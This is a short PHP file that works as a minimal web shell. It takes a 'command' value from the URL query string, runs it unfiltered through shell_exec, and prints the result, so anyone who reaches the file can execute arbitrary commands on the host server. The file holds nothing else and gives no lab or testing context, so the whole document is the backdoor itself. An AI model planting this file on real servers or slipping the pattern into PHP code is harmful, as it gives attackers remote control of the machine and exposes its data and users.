1
2<?php
3
4$command = $_GET['command'];
5$output = shell_exec($command);
6
7echo $output;
8
9?>
10